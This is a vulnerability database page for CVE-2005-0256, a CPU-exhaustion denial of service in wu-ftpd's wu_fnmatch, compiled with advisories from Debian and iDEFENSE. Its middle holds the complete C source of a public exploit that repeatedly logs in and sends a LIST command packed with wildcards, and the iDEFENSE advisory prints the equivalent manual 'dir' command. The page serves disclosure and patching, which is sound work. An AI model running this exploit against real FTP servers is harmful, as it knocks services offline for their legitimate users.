CVE-2005-0256
CVSS 5.0
Published: 2005-05-02 00:00:00
Last modified: 2011-03-07 00:00:00

[Original] The wu_fnmatch function in wu_fnmatch.c in wu-ftpd 2.6.1 and 2.6.2 allows remote attackers to cause a denial of service (CPU exhaustion by recursion) via a glob pattern with a large number of * (wildcard) characters, as demonstrated using the dir command.


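[CNNVD] Wu-ftpd File Globbing Remote Denial of Service Vulnerability (CNNVD-200505-441)

        Wu-ftpd is an FTP server program based on BSD ftpd, maintained by Washington University.
        The wu_fnmatch() function in the wu_fnmatch.c file included in Wu-ftpd has a security issue that a remote attacker can exploit to carry out a denial-of-service attack against the service.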

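- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploiting the vulnerability]
Attack vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]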

- CPE (affected platforms and products)

cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/a:washington_university:wu-ftpd:2.6.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1762 WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.11)
oval:org.mitre.oval:def:1333 WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.00)
oval:org.mitre.oval:def:1265 WU-FTPD "glob-*" Remote DoS Vulnerability (B.11.23)
* OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0256
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-441
(Official data source) CNNVD

- Other links and resources

http://www.debian.org/security/2005/dsa-705
(VENDOR_ADVISORY)  DEBIAN  DSA-705
http://www.vupen.com/english/advisories/2006/1271
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1271
http://www.vupen.com/english/advisories/2005/0588
(VENDOR_ADVISORY)  VUPEN  ADV-2005-0588
http://www.osvdb.org/14203
(UNKNOWN)  OSVDB  14203
http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050225 WU-FTPD File Globbing Denial of Service Vulnerability
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57795-1
(UNKNOWN)  SUNALERT  57795
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101699-1
(UNKNOWN)  SUNALERT  101699
http://secunia.com/advisories/19561
(VENDOR_ADVISORY)  SECUNIA  19561
http://secunia.com/advisories/18210
(VENDOR_ADVISORY)  SECUNIA  18210
http://secunia.com/advisories/14411
(VENDOR_ADVISORY)  SECUNIA  14411
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00637342
(UNKNOWN)  HP  HPSBUX02110
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00637342
(UNKNOWN)  HP  SSRT061110
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63/SCOSA-2005.63.txt
(UNKNOWN)  SCO  SCOSA-2005.63

- Vulnerability information

Wu-ftpd File Globbing Remote Denial of Service Vulnerability
Medium risk  Unknown
2005-05-02 00:00:00 2007-05-22 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (842)

wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit (EDBID:842)
linux dos
2005-02-25 Verified
0 str0ke
N/A
/*
 * wu-ftpd <= 2.6.2 File Globbing DoS 
 * str0ke@milw0rm.com
 * 
 * Advisory: http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities&flashstatus=true
 *
 * Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 21
usage(char *name)
{
printf("usage: %s -h hostname/ip -u user -p passwd\n",name);
printf("\t\t/str0ke!milw0rm.com wu-ftpd <= 2.6.2 File Globbing DoS\n");
exit(0);
}

main(int argc, char *argv[]) {
 char buffer[1000],host[255],user[255],pass[255],c;
 int sd, rc, i=0;
 struct sockaddr_in localAddr, servAddr;
 struct hostent *h;

if ( argc < 3) {
usage(argv[0]);
}

while ((c = getopt (argc, argv, "h:u:p:")) != EOF)
       switch(c)
       {
               case 'h':
                       strncpy(host,optarg,sizeof(host));
                       break;
               case 'u':
                       strncpy(user,optarg,sizeof(user));
                       break;
               case 'p':
                       strncpy(pass,optarg,sizeof(pass));
                       break;
       }

while(1) {

 h = gethostbyname(host);
 if(h==NULL) {
   printf("unknown host '%s'\n",host);
   exit(1);
 }

 servAddr.sin_family = h->h_addrtype;
 memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
 servAddr.sin_port = htons(SERVER_PORT);
 sd = socket(AF_INET, SOCK_STREAM, 0);
 if(sd<0) {
   perror("cannot open socket ");
   exit(1);
 }

 localAddr.sin_family = AF_INET;
 localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
 localAddr.sin_port = htons(0);

 rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
 if(rc<0) {
   printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
   perror("error ");
   exit(1);
 }

 printf("Trying To Connect To [%s]\n",host);
 rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
 if(rc<0) {
   perror("cannot connect ");
   exit(1);
 }
   printf("Trying Login With [%s]\n",user);
   snprintf(buffer,sizeof(buffer), "USER %s\r\n", user);
   rc = send(sd, buffer, strlen(buffer), 0);
   memset(buffer,0,sizeof(buffer));

while(1)
       {
       rc=recv(sd,buffer,sizeof(buffer),0);
       if(strstr(buffer,"331")) break;
       if(strstr(buffer,"421"))
               {
               printf("Access Denied on your arse..\n");
               exit(0);
               }
       }

   printf("Sending Pass - [%s]\n",pass);
   memset(buffer,0,sizeof(buffer));
   snprintf(buffer,sizeof(buffer), "PASS %s\r\n", pass);
   rc = send(sd,buffer, strlen(buffer), 0);

while(1)
       {
       rc=recv(sd,buffer,sizeof(buffer),0);
       if(strstr(buffer,"230")) break;
       if(strstr(buffer,"421"))
               {
               printf("Access Denied on your arse..\n");
               exit(0);
               }

       if(strstr(buffer,"530"))
               {
               printf("Access Denied: Login Incorrect!\n");
               exit(0);
               }
}

   memset(buffer,0,sizeof(buffer));
   snprintf(buffer,sizeof(buffer), "LIST ***********************************************************************************************************************************************************************************************.*\r\n");
   rc = send(sd,buffer, strlen(buffer), 0);
   printf("Dos Sent\n");

}

   if(rc<0) {
     perror("cannot send data ");
     close(sd);
     exit(1);
   }
return 0;
}

// milw0rm.com [2005-02-25]
		

- Vulnerability information (F36997)

dsa-705.txt (PacketStormID:F36997)
2005-04-17 00:00:00
 
advisory,denial of service
linux,debian
CVE-2005-0256,CVE-2005-0854

Debian Security Advisory 705-1 - Several denial of service conditions have been discovered in wu-ftpd, the popular FTP daemon.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 705-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
April 4th, 2005                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : wu-ftpd
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE IDs        : CAN-2005-0256 CAN-2003-0854

Several denial of service conditions have been discovered in wu-ftpd,
the popular FTP daemon.  The Common Vulnerabilities and Exposures
project identifies the following problems:

CAN-2005-0256

    Adam Zabrocki discovered a denial of service condition in wu-ftpd
    that could be exploited by a remote user and cause the server to
    slow down the server by resource exhaustion.

CAN-2003-0854

    Georgi Guninski discovered that /bin/ls may be called from within
    wu-ftpd in a way that will result in large memory consumption and
    hence slow down the server.

For the stable distribution (woody) these problems have been fixed in
version 2.6.2-3woody5.

For the unstable distribution (sid) these problems have been fixed in
version 2.6.2-19.

We recommend that you upgrade your wu-ftpd package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCUVrbW5ql+IAeqTIRAj7YAJ4jaACcvzyz5FIsqndJjCo9SSD9HACgkoAY
F4qlQSHqDayJl++iAY686+k=
=yOi3
-----END PGP SIGNATURE-----

    

- Vulnerability information (F36346)

iDEFENSE Security Advisory 2005-02-25.t (PacketStormID:F36346)
2005-02-28 00:00:00
iDefense Labs,Adam Zabrocki  idefense.com
advisory,remote,denial of service
CVE-2005-0256

iDEFENSE Security Advisory 02.25.05 - Remote exploitation of an input validation vulnerability in version 2.6.2 of WU-FTPD could allow for a denial of service of the system by resource exhaustion.

WU-FTPD File Globbing Denial of Service Vulnerability

iDEFENSE Security Advisory 02.25.05
www.idefense.com/application/poi/display?id=207&type=vulnerabilities
February 25, 2005

I. BACKGROUND

WU-FTPD is an ftp daemon for Unix systems developed at Washington 
University. More information is available at:

    http://www.wu-ftpd.org/

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in version
2.6.2 of WU-FTPD could allow for a denial of service of the system by 
resource exhaustion.

The vulnerability specifically exists in the wu_fnmatch() function in
wu_fnmatch.c. When a pattern containing a '*' character is supplied as 
input, the function calls itself recursively on a smaller substring. By 
supplying a string which contains a large number of '*' characters, the 
system will take a long time to return the results, during which time it
will be using a large amount of CPU time.

III. ANALYSIS

After a user logs into the ftpd, an attacker can send a simple command 
which will cause high CPU utilization.

To exploit this vulnerability, a simple ftp client is sufficient. Once
logged in, either anonymously or as an authenticated user, issuing the
following command will cause the machine to become less responsive.

ftp> dir ***************************************************************
         ***************************************************************
         ***************************************************************
         **.*

By re-connecting and issuing the command multiple times, the system can
be made completely unresponsive. This may prevent legitimate access to 
services provided by the system for the period of the attack.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in version 
2.6.2 and 2.6.1 of WU-FTPD. It is suspected that previous versions are 
also affected by this vulnerability.

V. WORKAROUND

Consider disabling the ftpd. If this is not viable as an option, 
consider disabling anonymous access. Disabling anonymous access will not
prevent local users from exploiting this vulnerability.

VI. VENDOR RESPONSE

No vendor response received.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0256 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/09/2005  Initial vendor notification - No response
02/18/2005  Initial vendor notification - No response
02/25/2005  Public disclosure

IX. CREDIT

Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- Vulnerability information

14203
WU-FTPD wu_fnmatch() Function File Globbing Remote DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

WU-FTPD contains a flaw that may allow a remote attacker to cause a Denial of Service condition. The issue is due to the wu_fnmatch function in wu_fnmatch.c not properly sanitizing user input. With a specially crafted glob pattern combined with a large number of wildcard characters (*), an attacker can cause the service to use excessive CPU cycles and exhaust all available resources.

- Timeline

2005-02-25 2005-02-09
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
